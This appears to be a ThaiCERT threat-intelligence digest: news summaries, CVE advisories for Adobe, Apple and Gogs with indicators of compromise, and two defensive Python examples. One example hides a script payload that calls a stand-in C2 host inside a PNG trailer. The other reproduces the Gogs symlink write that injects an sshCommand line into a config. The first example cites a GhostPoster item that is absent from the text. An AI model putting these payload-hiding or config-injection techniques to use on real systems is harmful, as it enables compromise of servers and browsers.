        "Petróleos de Venezuela (PDVSA), Venezuela's state-owned oil company, was hit by a cyberattack over the weekend that disrupted its export operations. In a Monday statement, PDVSA denied that the Saturday morning incident affected its operations in any way, adding that the breach was limited to some administrative systems. "Thanks to the expertise of PDVSA's human talent, the operational areas were not affected in any way, with the attack being limited to its administrative system," the company said."
        https://www.bleepingcomputer.com/news/security/cyberattack-disrupts-venezuelan-oil-giant-pdvsas-operations/
        https://therecord.media/venezuela-state-oil-company-blames-cyberattack-on-us
        https://www.darkreading.com/cyber-risk/venezuela-oil-company-downplays-alleged-us-cyberattack
        https://securityaffairs.com/185755/security/a-cyber-attack-hit-petroleos-de-venezuela-pdvsa-disrupting-export-operations.html

      General News

      • AI Might Be The Answer For Better Phishing Resilience
        "Phishing is still a go-to tactic for attackers, which is why even small gains in user training are worth noticing. A recent research project from the University of Bari looked at whether LLMs can produce training that helps people spot suspicious emails with better accuracy. The research team ran two controlled studies with a total of 480 participants. Both studies used content generated by an LLM to deliver phishing awareness lessons."
        https://www.helpnetsecurity.com/2025/12/16/ai-generated-phishing-training-study/
        https://arxiv.org/pdf/2512.01893
      • Passwordless Is Finally Happening, And Users Barely Notice
        "Security teams know the strain that comes from tightening authentication controls while keeping users productive. A new report from Okta suggests this strain is easing. Stronger authentication methods are gaining traction, and many of them let users move through sign in flows with less effort than before. The report indicates that the long held belief that better security slows people down is becoming less relevant as these methods improve both protection and usability."
        https://www.helpnetsecurity.com/2025/12/16/okta-mfa-security-shift-report/
      • Fraudulent Call Centres In Ukraine Rolled Up
        "Authorities from the Czech Republic, Latvia, Lithuania and Ukraine with the support of Eurojust took action against a criminal network operating call centres in Dnipro, Ivano-Frankivsk and Kyiv, Ukraine that scammed victims across Europe. The criminal group established a professional organisation with employees who received a percentage of the proceeds for each completed scam. The estimated damage to more than 400 known victims is over EUR 10 million. The fraudsters used various scams, such as posing as police officers to withdraw money using their victims’ cards and details, or pretending that their victims’ bank accounts had been hacked."
        https://www.eurojust.europa.eu/news/fraudulent-call-centres-ukraine-rolled
        https://www.bleepingcomputer.com/news/security/european-authorities-dismantle-call-center-fraud-ring-in-ukraine/
        https://www.helpnetsecurity.com/2025/12/16/ukraine-scam-call-centers/
      • Common Holiday Phishing Threats And How To Recognize Them
        "The holiday season brings a flurry of online shopping, travel plans, and end-of-year workplace activity. With that, it also brings a surge of phishing scams that try to take advantage of all that hustle and distraction. With inboxes filling up faster than gift lists, it becomes easier for a convincing message to slip through. The United States FBI notes that holiday scams often involve criminals posing as trusted companies or contacts in order to steal personal information, credentials, or money. This includes emails or messages that encourage victims to click links, provide sensitive data, or download malware."
        https://cofense.com/blog/common-holiday-phishing-threats-and-how-to-recognize-them
      • Enterprises Gear Up For 2026’s IT Transformation
        "An IT infrastructure refresh is set for 2026, and while strategies will mainly focus on artificial intelligence (AI), the cloud will also play a pivotal role. First there was COVID, which forced enterprises to adopt more hybrid approaches to the workday. More recently, the industry experienced a shift that put AI front and center. Both of those factors – which ignited the need for better data, access, and security controls - will influence how organizations think about their infrastructure for the coming year."
        https://www.darkreading.com/cybersecurity-operations/enterprises-gear-up-for-2026-s-it-transformation
      • Link11 Identifies Five Cybersecurity Trends Set To Shape European Defense Strategies In 2026
        "Link11, a European provider of web infrastructure security solutions, has released new insights outlining five key cybersecurity developments expected to influence how organizations across Europe prepare for and respond to threats in 2026. The findings are based on analysis of current threat activity, industry research, and insights from the Link11 European Cyber Report, alongside broader market indicators such as PwC’s Global Digital Trust Insights 2026."
        https://hackread.com/link11-identifies-five-cybersecurity-trends-set-to-shape-european-defense-strategies-in-2026/
      • Android Mobile Adware Surges In Second Half Of 2025
        "Android users spent 2025 walking a tighter rope than ever, with malware, data‑stealing apps, and SMS‑borne scams all climbing sharply while attackers refined their business models around mobile data and access. Looking back, we may view 2025 as the year when one-off scams were replaced on the score charts by coordinated, well-structured, attack frameworks. Comparing two equal six‑month periods—December 2024 through May 2025 versus June through November 2025—our data shows Android adware detections nearly doubled (90% increase), while PUP detections increased by roughly two‑thirds and malware detections by about 20%."
        https://www.malwarebytes.com/blog/mobile/2025/12/android-threats-in-2025-when-your-phone-becomes-the-main-attack-surface
      • Where Cloud Security Stands Today And Where AI Breaks It
        "Every year, the cloud is becoming more distributed, automated and tightly wired into the business. Every day, adversaries compress the timeline between compromise and data exfiltration. What once took them 44 days now takes minutes. For the fifth year in a row, Palo Alto Networks State of Cloud Security Report 2025 captures the changes both big and small that security leaders are navigating in the market today. Our report reveals that the rapid adoption of enterprise AI is fueling an unprecedented surge in cloud security risks, driving a massive expansion of the attack surface. We found that 99% of organizations experienced at least one attack on their AI systems within the past year, and the acceleration of GenAI-assisted coding is outstripping security teams' capacity to keep pace. What’s missing isn't just visibility, it’s alignment."
        https://www.paloaltonetworks.com/blog/2025/12/cloud-security-2025-report-insights/
      • From Open Source To OpenAI: The Evolution Of Third-Party Risk
        "The Silicon Valley mantra to “move fast and break things” prioritizes growth over anything else. Unfortunately, this velocity extends to efficiently introducing vulnerabilities into the software supply chain. From open source software libraries to AI-enabled coding assistants, these tools enable rapid innovations, but they are also enabling attack vectors that threat actors are looking to exploit. Third-party risks have always been an issue, but they have not always been top of mind. For the past decade, ransomware dominated the headlines and mindshare of cybersecurity leaders."
        https://www.securityweek.com/from-open-source-to-openai-the-evolution-of-third-party-risk/
      • CISO Communities – Cybersecurity’s Secret Weapon
        "The only defense better than the expertise of one CISO is the combined expertise of many CISOs. In recent years, closed CISO communities have increased in number and grown in size. They act as an information exchange, advice center, pressure valve, and safe haven from the critical oversight. The need is obvious. CISOs occupy a unique position in business. Despite greater integration with business operations, they remain the only business leaders trying to counter active and adaptive threats; and yet they remain a role that is little understood by the rest of the business. The only other leaders capable of discussing their needs, grouses, pressures and adversaries are other CISOs (although 1001 product vendors claim they understand and offer expensive solutions)."
        https://www.securityweek.com/ciso-communities-cybersecuritys-secret-weapon/
      • CAL, MITRE v18 & MITRE ATLAS: The Map I Wish I Had In The SOC
        "I remember a Thursday night at a previous SOC position in FinTech. The alert queue spiked during a credential stuffing incident, and our team had to scramble to keep up with the influx of alerts. We had a SIEM, a SOAR, and a handful of open-source IOCs we continuously retrieved via Google and other search engines. Each analyst grabbed a ticket and went hunting alone, starting their own process from scratch. We could isolate hosts, block domains, and re-image servers, but it was difficult to see the whole picture as we sorted through mountains of data and noise. Speed was the metric that mattered. I knew we were missing critical patterns, but I couldn’t see them or communicate what I thought we might be missing. We were moving fast, but we were still relatively blind."
        https://threatconnect.com/blog/cal-mitre-v18-mitre-atlas-the-map-i-wish-i-had-in-the-soc/
      • Cyber Risk Management: Defenders Tell It Like It Is
        "Every year, members of the Trend team pack their bags, blow up their neck pillows, and jet off to share cybersecurity insights with customers and industry leaders across the globe as part of our Trend World Tour. In 2024, we decided to make the event more of a two-way conversation by surveying cybersecurity professionals on the challenges they face and what matters to them. The result was our first-ever Trend Micro Defenders Survey Report, a data-driven account of frontline perspectives on key issues and emerging opportunities for cybersecurity professionals. It was so well received, we repeated the exercise in 2025, tripling the scope with more than 3,000 responses from 88 countries."
        https://www.trendmicro.com/en_us/research/25/l/trend-micros-2025-defenders-survey-report.html
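The GhostPoster item in the Malware section above describes an extension that reads its own logo file and scans the raw bytes for a marker that "shouldn't be there". As an added example (not Koi Security's code and not the extension's), the following Python builds a constructed 1x1 PNG, appends a hypothetical marker and a constructed script payload after the IEND chunk, and shows both halves of the trick: the loader's extraction step, and the audit a reviewer can run over an extension's icon files. The audit goes slightly beyond the page's case: it walks the chunk table and, besides reporting bytes after IEND, flags chunk types a logo has no reason to carry, since a payload can just as well be hidden inside an ancillary chunk. The marker `--GP--`, the payload and the chunk allow-list are assumptions for the example; the real sample's marker is not given on the page.

```python
import re
import struct
import zlib

# Added example, not code from the GhostPoster analysis. The marker and payload
# below are constructed stand-ins; the real sample's marker is not on the page.
PNG_SIG = b"\x89PNG\r\n\x1a\n"
MARKER = b"--GP--"                                                     # hypothetical marker
PAYLOAD = b"(function(){fetch('https://example.invalid/c2');})();"    # constructed payload
KNOWN_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tEXt", b"zTXt", b"iTXt",
                b"pHYs", b"gAMA", b"sRGB", b"cHRM", b"tRNS", b"bKGD", b"tIME", b"iCCP"}


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png_1x1() -> bytes:
    """Construct a minimal valid 1x1 opaque-black RGBA PNG (sample input)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)   # 1x1, 8-bit, RGBA, no interlace
    scanline = b"\x00" + b"\x00\x00\x00\xff"              # filter type 0 + one pixel
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline))
            + _chunk(b"IEND", b""))


def walk_chunks(data: bytes):
    """Yield (type, data_offset, length) per chunk; stop after IEND or on truncation."""
    if not data.startswith(PNG_SIG):
        return
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):
            return                                      # truncated chunk, stop parsing
        yield ctype, pos + 8, length
        pos += 12 + length                              # header (8) + data + CRC (4)
        if ctype == b"IEND":
            return


def audit_png(data: bytes) -> dict:
    """Reviewer's view of an icon: bytes after IEND and chunk types a logo should not need."""
    end = -1
    unknown = []
    for ctype, off, length in walk_chunks(data):
        if ctype not in KNOWN_CHUNKS:
            unknown.append(ctype.decode("latin-1"))
        if ctype == b"IEND":
            end = off + length + 4                      # offset just past the IEND CRC
    trailing = data[end:] if end >= 0 else b""
    return {
        "valid_png": data.startswith(PNG_SIG) and end >= 0,
        "trailing_bytes": len(trailing),
        "unknown_chunks": unknown,
        "script_like_trailer": bool(re.search(
            rb"\b(function|eval|fetch|XMLHttpRequest|browser|chrome)\b", trailing)),
    }


def extract_after_marker(data: bytes, marker: bytes):
    """The loader's side: find the marker in the raw bytes and return what follows it."""
    idx = data.find(marker)
    return None if idx < 0 else data[idx + len(marker):]


CLEAN_ICON = build_png_1x1()
TROJANED_ICON = CLEAN_ICON + MARKER + PAYLOAD   # viewers ignore everything after IEND


if __name__ == "__main__":
    print(audit_png(CLEAN_ICON))
    print(audit_png(TROJANED_ICON))
    print(extract_after_marker(TROJANED_ICON, MARKER))
```

Both icons render identically, which is the whole point: the audit has to look at the bytes, not the picture. Run `audit_png` over every image in an extension package and treat non-zero `trailing_bytes` or unexpected chunk types as something to open up by hand.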

Reference
Electronic Transactions Development Agency (ETDA)

Posted in Cyber Security News by NCSA_THAICERT
• 🚨Urgent! Alert: Adobe has released security updates fixing critical vulnerabilities in Adobe ColdFusion and Adobe Experience Manager

ThaiCERT has been closely monitoring the cyber threat situation and found that Adobe has released security updates fixing several critical vulnerabilities affecting products that are widely used in government agencies, the private sector and large organisations. Systems left on an affected version without remediation may give an attacker a way to compromise the system and take control of the server remotely.

🔴 Key vulnerability details

Adobe ColdFusion
• CVE-2025-61809 (CVSS 9.8)
An Improper Input Validation vulnerability. An attacker can send specially crafted (malicious) input to bypass security controls and read or write data within the system, which may lead to Remote Code Execution (RCE).
• CVE-2025-61808 (CVSS 9.1)
A vulnerability in the file-upload process. An attacker who already holds high privileges can use it to upload a malicious file, leading to unauthorised code execution.
Adobe Experience Manager (AEM)
• CVE-2025-64537 and CVE-2025-64539 (CVSS 9.3)
DOM-based Cross-Site Scripting (XSS) vulnerabilities. If exploited, an attacker can inject malicious script into the web application and trick users into executing it, resulting in theft of user data or its use in further attacks.

🎯 Affected products and versions
Adobe ColdFusion
• ColdFusion 2021 – Update 22 and earlier
• ColdFusion 2023 – Update 16 and earlier
• ColdFusion 2025 – Update 4 and earlier
Adobe Experience Manager (AEM)
• AEM Cloud Service (CS)
• AEM 6.5 LTS
• AEM 6.5.23 and earlier

🔎 Verification and mitigation guidance

1. Administrators should check which versions of Adobe ColdFusion and Adobe Experience Manager (AEM) are currently deployed to determine whether their systems fall within the affected range, giving priority to systems exposed to the Internet.
2. Update to the latest version following Adobe's guidance as soon as possible; this is the most effective remediation and removes the risk from these vulnerabilities permanently.

If an immediate update is not possible, take the following steps

1. Use a Web Application Firewall to detect and block requests with anomalous behaviour, in particular suspicious file uploads, Remote Code Execution attempts and Cross-Site Scripting.
2. Review the logs of the web server, the application server, ColdFusion and AEM for activity that may indicate an attack or an attempt to access the system without authorisation.
3. Consider disabling or restricting functions that are not required for the service, such as file upload or unused modules and plugins, and review and reduce user account privileges in line with the principle of Least Privilege.
4. Back up systems and critical data regularly and prepare an incident response plan so that action can be taken quickly if an attack or anomaly is detected.

📌 For general users
Users of internal organisational systems should avoid clicking links or opening files from unknown sources, and should report to the administrator immediately if the system behaves abnormally, for example running more slowly or showing unfamiliar alert messages.

🔗 Sources:
1. https://csa.gov.sg/alerts-and-advisories/alerts/al-2025-119/
2. https://nvd.nist.gov/vuln/detail/CVE-2025-61808
3. https://nvd.nist.gov/vuln/detail/CVE-2025-61809
4. https://nvd.nist.gov/vuln/detail/CVE-2025-64537
5. https://nvd.nist.gov/vuln/detail/CVE-2025-64539


With best regards,
National Cyber Security Agency (NCSA) / ThaiCERT

      #AdobePatch
      #ColdFusion
      #AEM
      #CVE2025
      #CyberSecurity
      #ThaiCERT
      #ช่องโหว่Adobe

Posted in Cyber Security News by NCSA_THAICERT
• Apple releases emergency updates fixing two WebKit zero-day vulnerabilities already exploited in the wild


Follow the news on the webboard or on Facebook NCSA Thailand

Posted in Cyber Security News by NCSA_THAICERT
• CERT-FR advises iPhone and Android users to turn off Wi-Fi whenever it is not in use, to reduce security risk


Follow the news on the webboard or on Facebook NCSA Thailand

Posted in Cyber Security News by NCSA_THAICERT
• Warning! Scammers abuse a weakness in PayPal's "Subscriptions" feature to send phishing emails from the genuine domain


Follow the news on the webboard or on Facebook NCSA Thailand

Posted in Cyber Security News by NCSA_THAICERT
• 🚨Urgent!! Vulnerabilities in Apple products, update immediately

ThaiCERT warns of confirmed in-the-wild attacks exploiting two Apple vulnerabilities, with a risk that devices may be seized or controlled. Update to iOS/iPadOS 26.2, macOS Tahoe 26.2 or the other relevant latest versions immediately.

⚠️ Vulnerability details
• CVE-2025-43529 is a Use-after-free vulnerability in WebKit that may allow an attacker to achieve Remote Code Execution when the user opens a specially crafted web page.
• CVE-2025-14174 is a Memory Corruption vulnerability that may cause memory to be mishandled when malicious web content is processed.

📲 Affected devices and fixed versions

Affected devices
- iPhone 11 and later
- iPad Pro 12.9-inch (3rd generation and later)
- iPad Pro 11-inch (1st generation and later)
- iPad Air (3rd generation and later)
- iPad (8th generation and later)
- iPad mini (5th generation and later)

Apple has released security updates fixing the vulnerabilities in its products; the fixed versions are as follows
- iOS 26.2 and iPadOS 26.2
- iOS 18.7.3 and iPadOS 18.7.3
- macOS Tahoe 26.2
- tvOS 26.2
- watchOS 26.2
- visionOS 26.2
- Safari 26.2 for macOS Sonoma and macOS Sequoia

🛡️ Prevention and risk reduction
· Update the operating system and Safari to the latest version immediately
· Watch for abnormal device behaviour, especially in website visits, network connections and browser activity
· Organisations should enforce a patch-update policy covering all managed user devices, and should not allow security patches to be deferred

📢 Update the software on every Apple device without delay, for your own safety

With best regards,
National Cyber Security Agency (NCSA) / ThaiCERT

🔗 Sources
1. https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-117/
2. https://nvd.nist.gov/vuln/detail/CVE-2025-14174
3. https://support.apple.com/en-us/100100
4. https://coesecurity.com/apple-patches-two-webkit-zero-days-actively-exploited-in-sophisticated-attacks/



Posted in Cyber Security News by NCSA_THAICERT
• Urgent warning! Severe vulnerability (CVE-2025-8110) in Gogs under heavy attack, servers at risk of immediate takeover

Cyber security situation report: a new wave of attacks is targeting Gogs (a popular self-hosted Git service) through a critical vulnerability for which no complete patch is yet available; more than 700 servers worldwide have already been compromised. Administrators must take protective action immediately.


Executive Summary
• CVE ID: CVE-2025-8110
• Severity (CVSS): 8.7 (High)
• Status: Active Exploitation (widespread real-world attacks)
• Impact: an attacker can execute code remotely (RCE) and take complete control of the server
• Cause: unsafe handling of symbolic links in the API, resulting in a Path Traversal vulnerability


Technical details: when the "old patch" is not enough
This is a bypass vulnerability, i.e. it evades a protection that was already in place. Gogs had previously fixed CVE-2024-55947 to prevent cross-directory file access, but that check has a weakness: it "does not correctly check for Symbolic Links (Symlinks)".
Attack chain:

1. Infiltration: the attacker registers an account and creates a new repository (usually through a publicly exposed Open Registration system)
2. Preparation: commits a file that is a symlink pointing at a sensitive system file (for example a config file)
3. Execution: calls the PutContents API to write data to that symlink. Gogs only checks the file name within the repository (which looks normal), but when the operating system performs the actual write, the data passes through to the target the symlink points to
4. Takeover: the attacker typically overwrites the .git/config file, inserting an sshCommand entry that makes the server run malicious commands, leading to full compromise (RCE)

Observed damage (Impact & Indicators)
Examination of victim servers revealed the following attacker behaviour:
• Malware implant: the Supershell (C2 framework) malware is installed, hidden through obfuscation and packed with UPX
• Outbound connections: the victim machine opens a Reverse SSH Shell back to the attacker's C2 server and waits for commands
Signs that you may have been attacked (IoCs - Indicators of Compromise):

1. Unknown repositories: repositories named with 8 random ASCII letters and digits (e.g. IV79VAew, Km4zoh4s) created from July 2025 onwards
2. Suspicious traffic: firewall logs showing outbound connections to IP 119.45.176[.]196
3. Abnormal config file: a .git/config file with an sshCommand line inserted
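Steps 2 to 4 of the attack chain above, and IoC 3, come down to one property of the operating system: a write to a path that is a symlink lands wherever the link points, so a check that only inspects the repository-relative name proves nothing about where the bytes end up. As an added example (not Gogs' code, and not a reproduction of the Wiz exploit), the following Python creates a stand-in for a server-side repository config, a checkout containing a committed symlink to it, and a harmless stand-in for the sshCommand payload; it then shows the naive write following the link, a hardened write refusing it while still serving ordinary files, and the check for an injected sshCommand line from IoC 3. The directory layout, file names and the `echo pwned` command are constructed for the example.

```python
import os
import re
import tempfile
from pathlib import Path

# Added example, not Gogs' own code. It demonstrates the symlink property the
# advisory describes; every path and file content here is constructed for the demo.


def _name_check(rel_path: str) -> None:
    """A name-only check of the kind the earlier traversal fix relies on."""
    if os.path.isabs(rel_path) or ".." in Path(rel_path).parts:
        raise ValueError("rejected by name check")


def write_naive(repo_root: str, rel_path: str, content: bytes) -> str:
    """Vulnerable pattern: the name passes, then open() follows whatever rel_path is."""
    _name_check(rel_path)
    target = os.path.join(repo_root, rel_path)
    with open(target, "wb") as fh:             # follows a symlink at target
        fh.write(content)
    return os.path.realpath(target)            # where the bytes actually went


def write_hardened(repo_root: str, rel_path: str, content: bytes) -> str:
    """Resolve the parent, confine it to the repo, refuse a symlink leaf, and open
    with O_NOFOLLOW so a link swapped in after the check still cannot be followed."""
    _name_check(rel_path)
    root = os.path.realpath(repo_root)
    full = os.path.join(root, rel_path)
    parent = os.path.realpath(os.path.dirname(full))
    if os.path.commonpath([root, parent]) != root:
        raise PermissionError("parent directory resolves outside the repository")
    if os.path.islink(full):
        raise PermissionError("refusing to write through a symlink")
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(full, flags, 0o644)           # ELOOP if a symlink raced in after islink()
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    return os.path.realpath(full)


SSH_COMMAND_RE = re.compile(r"^\s*sshCommand\s*=", re.IGNORECASE | re.MULTILINE)


def config_has_ssh_command(config_text: str) -> bool:
    """IoC 3: a git config that has grown an sshCommand line (git keys are case-insensitive)."""
    return SSH_COMMAND_RE.search(config_text) is not None


def demo() -> dict:
    base = Path(tempfile.mkdtemp(prefix="gogs-symlink-demo-"))
    server_cfg = base / "victim.git" / "config"          # stands in for a repo config on the server
    server_cfg.parent.mkdir()
    original = "[core]\n\tbare = true\n"
    server_cfg.write_text(original)

    checkout = base / "attacker-repo"                    # step 1: the attacker's fresh repository
    checkout.mkdir()
    os.symlink(server_cfg, checkout / "notes.txt")       # step 2: the committed symlink
    hostile = b"[core]\n\tsshCommand = echo pwned\n"    # step 4 payload, harmless stand-in

    results = {}
    landed = write_naive(str(checkout), "notes.txt", hostile)   # step 3 via the vulnerable path
    results["naive_write_landed_on_server_config"] = landed == os.path.realpath(str(server_cfg))
    results["naive_injected_ssh_command"] = config_has_ssh_command(server_cfg.read_text())

    server_cfg.write_text(original)                      # reset, then retry through the hardened path
    try:
        write_hardened(str(checkout), "notes.txt", hostile)
        results["hardened_blocked"] = False
    except OSError:                                      # PermissionError is an OSError
        results["hardened_blocked"] = True
    results["server_config_intact"] = server_cfg.read_text() == original

    write_hardened(str(checkout), "real.txt", b"hello")  # ordinary files inside the repo still work
    results["hardened_regular_write_ok"] = (checkout / "real.txt").read_bytes() == b"hello"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The hardened path checks the resolved parent directory (so a symlinked directory cannot smuggle the write out either) and the leaf separately, and relies on O_NOFOLLOW rather than on the islink() call alone, because between the check and the open the attacker can replace a regular file with a link. `config_has_ssh_command` can be run over every repository's config on a Gogs host to triage IoC 3.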

🚨 Urgent recommendations and mitigation
Because, as of now (December 2025), there is still no complete official patch, administrators must do the following immediately:

1. Close the front door (most urgent measure)
  • Disable Open Registration: immediately stop the public from self-registering, to cut off the creation of accounts used for attacks
  o How: edit custom/conf/app.ini and set DISABLE_REGISTRATION = true in the [service] section
  • Restrict access (Network Segmentation): do not expose Gogs directly to the public Internet; make it reachable only through a VPN or from an IP allow-list
2. Change the authentication method
  • If multiple users are required, switch to SSO or LDAP instead of self-registration
3. Monitoring
  • Check the Gogs GitHub Releases regularly and update as soon as a version newer than 0.13.3 is released
  • For higher assurance, consider migrating to Gitea, a fork that receives security updates more regularly

With best regards,
National Cyber Security Agency (NCSA) / ThaiCERT

🔗 Source
      https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit


Posted in Cyber Security News by NCSA_THAICERT
    • Cyber Threat Intelligence 16 December 2025

      New Tooling

      • Prometheus: Open-Source Metrics And Monitoring Systems And Services
        "Prometheus is an open-source monitoring and alerting system built for environments where services change often and failures can spread fast. For security teams and DevOps engineers, it has become a common way to track system behavior, spot early warning signs, and understand what is happening across large sets of workloads."
        https://www.helpnetsecurity.com/2025/12/15/prometheus-open-source-metrics-monitoring-systems-services/
        https://github.com/prometheus/prometheus

      Vulnerabilities

      • Atlassian Patches Critical Apache Tika Flaw
        "Atlassian has rolled out patches for roughly 30 third-party vulnerabilities impacting its products, including critical-severity flaws. The first security defect that stands out is CVE-2025-66516 (CVSS score of 10/10), a critical-severity XML External Entity (XXE) injection bug in Apache Tika. Impacting the tika-core, tika-pdf-module, and tika-parsers modules of the universal parser, the flaw was disclosed in early December. It can be exploited via crafted XFA files placed inside PDF files, potentially leading to information leaks, denial-of-service (DoS), SSRF attacks, or remote code execution (RCE)."
        https://www.securityweek.com/atlassian-patches-critical-apache-tika-flaw/
        https://securityaffairs.com/185710/security/atlassian-fixed-maximum-severity-flaw-cve-2025-66516-in-apache-tika.html
      • FreePBX Patches Critical SQLi, File-Upload, And AUTHTYPE Bypass Flaws Enabling RCE
        "Multiple security vulnerabilities have been disclosed in the open-source private branch exchange (PBX) platform FreePBX, including a critical flaw that could result in an authentication bypass under certain configurations. The shortcomings, discovered by Horizon3.ai and reported to the project maintainers on September 15, 2025, are listed below -"
        https://thehackernews.com/2025/12/freepbx-authentication-bypass-exposed.html
      • CISA Adds Two Known Exploited Vulnerabilities To Catalog
        "CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2025-14611 Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
        CVE-2025-43529 Apple Multiple Products Use-After-Free WebKit Vulnerability"
        https://www.cisa.gov/news-events/alerts/2025/12/15/cisa-adds-two-known-exploited-vulnerabilities-catalog
        https://securityaffairs.com/185716/hacking/u-s-cisa-adds-apple-and-gladinet-centrestack-and-triofox-flaws-to-its-known-exploited-vulnerabilities-catalog.html

      Malware

      • Frogblight Threatens You With a Court Case: a New Android Banker Targets Turkish Users
        "In August 2025, we discovered a campaign targeting individuals in Turkey with a new Android banking Trojan we dubbed “Frogblight”. Initially, the malware was disguised as an app for accessing court case files via an official government webpage. Later, more universal disguises appeared, such as the Chrome browser. Frogblight can use official government websites as an intermediary step to steal banking credentials. Moreover, it has spyware functionality, such as capabilities to collect SMS messages, a list of installed apps on the device and device filesystem information. It can also send arbitrary SMS messages."
        https://securelist.com/frogblight-banker/118440/
      • Threats Behind The Mask Of Gentlemen Ransomware
        "Gentlemen is a new ransomware group first identified around August 2025. The group operates a double extortion model that involves breaching corporate networks, exfiltrating data, encrypting the data, and then using the encrypted data to extort victims. During the breach, the group employs typical tactics seen in advanced ransomware groups, such as Group Policy Objects (GPO) manipulation and Bring Your Own Vulnerable Driver (BYOVD). As of now, there is no clear evidence that the group is operating on a Ransomware as a Service (RaaS) model. Additionally, it is yet to be confirmed whether the group is a rebranding of an existing ransomware group or a sub-group."
        https://asec.ahnlab.com/en/91545/
      • SantaStealer Is Coming To Town: A New, Ambitious Infostealer Advertised On Underground Forums
        "Rapid7 Labs has identified a new malware-as-a-service information stealer being actively promoted through Telegram channels and on underground hacker forums. The stealer is advertised under the name “SantaStealer” and is planned to be released before the end of 2025. Open source intelligence suggests that it recently underwent a rebranding from the name “BluelineStealer.” The malware collects and exfiltrates sensitive documents, credentials, wallets, and data from a broad range of applications, and aims to operate entirely in-memory to avoid file-based detection. Stolen data is then compressed, split into 10 MB chunks, and sent to a C2 server over unencrypted HTTP."
        https://www.rapid7.com/blog/post/tr-santastealer-is-coming-to-town-a-new-ambitious-infostealer-advertised-on-underground-forums/
        https://www.bleepingcomputer.com/news/security/new-santastealer-malware-steals-data-from-browsers-crypto-wallets/
      • Askul Confirms Theft Of 740k Customer Records In Ransomware Attack
        "Japanese e-commerce giant Askul Corporation has confirmed that RansomHouse hackers stole around 740,000 customer records in the ransomware attack it suffered in October. Askul is a large business-to-business and business-to-consumer office supplies and logistics e-commerce company owned by Yahoo! Japan Corporation. The ransomware incident in October caused an IT system failure, forcing the company to suspend shipments to customers, including the retail giant Muji."
        https://www.bleepingcomputer.com/news/security/askul-confirms-theft-of-740k-customer-records-in-ransomhouse-attack/
      • Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)
        "On Dec. 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 (aka "React2Shell"), was publicly disclosed. Shortly after disclosure, Google Threat Intelligence Group (GTIG) had begun observing widespread exploitation across many threat clusters, ranging from opportunistic cyber crime actors to suspected espionage groups. GTIG has identified distinct campaigns leveraging this vulnerability to deploy a MINOCAT tunneler, SNOWLIGHT downloader, HISONIC backdoor, and COMPOOD backdoor, as well as XMRIG cryptocurrency miners, some of which overlap with activity previously reported by Huntress."
        https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182/
        https://www.bleepingcomputer.com/news/security/google-links-more-chinese-hacking-groups-to-react2shell-attacks/
        https://www.bankinfosecurity.com/nation-state-cybercrime-exploits-tied-to-react2shell-a-30285
        https://www.securityweek.com/google-sees-5-chinese-groups-exploiting-react2shell-for-malware-delivery/
        https://www.theregister.com/2025/12/15/react2shell_flaw_china_iran/
      • GitHub Scanner For React2Shell (CVE-2025-55182) Turns Out To Be Malware
        "A GitHub repository posing as a vulnerability scanner for CVE-2025-55182, also referred to as “React2Shell,” was exposed as malicious after spreading malware. The project, named React2shell-scanner, was hosted under the user niha0wa and has since been removed from the platform following community reports. Saurabh, a cybersecurity researcher, flagged the now-deleted tool on LinkedIn last week after identifying suspicious behaviour in the code. According to his post, the script included a hidden payload designed to execute mshta.exe and fetch a remote file from py-installer.cc, a known technique used to drop second-stage malware."
        https://hackread.com/github-scanner-react2shell-cve-2025-55182-malware/
      • Operation MoneyMount-ISO — Deploying Phantom Stealer Via ISO-Mounted Executables
        "At Seqrite Labs, we continuously monitor global cyber threat activity. During ongoing threat monitoring, the Seqrite Labs Researcher Team identified an active phishing campaign originating from Russia. This campaign employs a fake payment confirmation lure to deliver the Phantom information-stealing malware through a multi-stage attachment chain. The attack initiates with a social engineering email masquerading as legitimate financial correspondence, claiming to confirm a payment transaction. The email contains a malicious ZIP archive, which, when opened, triggers the execution of the payload."
        https://www.seqrite.com/blog/operation-moneymount-iso-deploying-phantom-stealer-via-iso-mounted-executables/
        https://thehackernews.com/2025/12/phantom-stealer-spread-by-iso-phishing.html
        https://www.infosecurity-magazine.com/news/russian-phishing-phantom-stealer/
      • 8 Million Users' AI Conversations Sold For Profit By "Privacy" Extensions
        "A few weeks ago, I was wrestling with a major life decision. Like I've grown used to doing, I opened Claude and started thinking out loud, laying out the options, weighing the tradeoffs, asking for perspective. Midway through the conversation, I paused. I realized how much I'd shared: not just this decision, but months of conversations: personal dilemmas, health questions, financial details, work frustrations, things I hadn't told anyone else. I'd developed a level of candor with my AI assistant that I don't have with most people in my life. And then an uncomfortable thought: what if someone was reading all of this?"
        https://www.koi.ai/blog/urban-vpn-browser-extension-ai-conversations-data-collection
        https://thehackernews.com/2025/12/featured-chrome-browser-extension.html
      • Amazon Threat Intelligence Identifies Russian Cyber Threat Group Targeting Western Critical Infrastructure
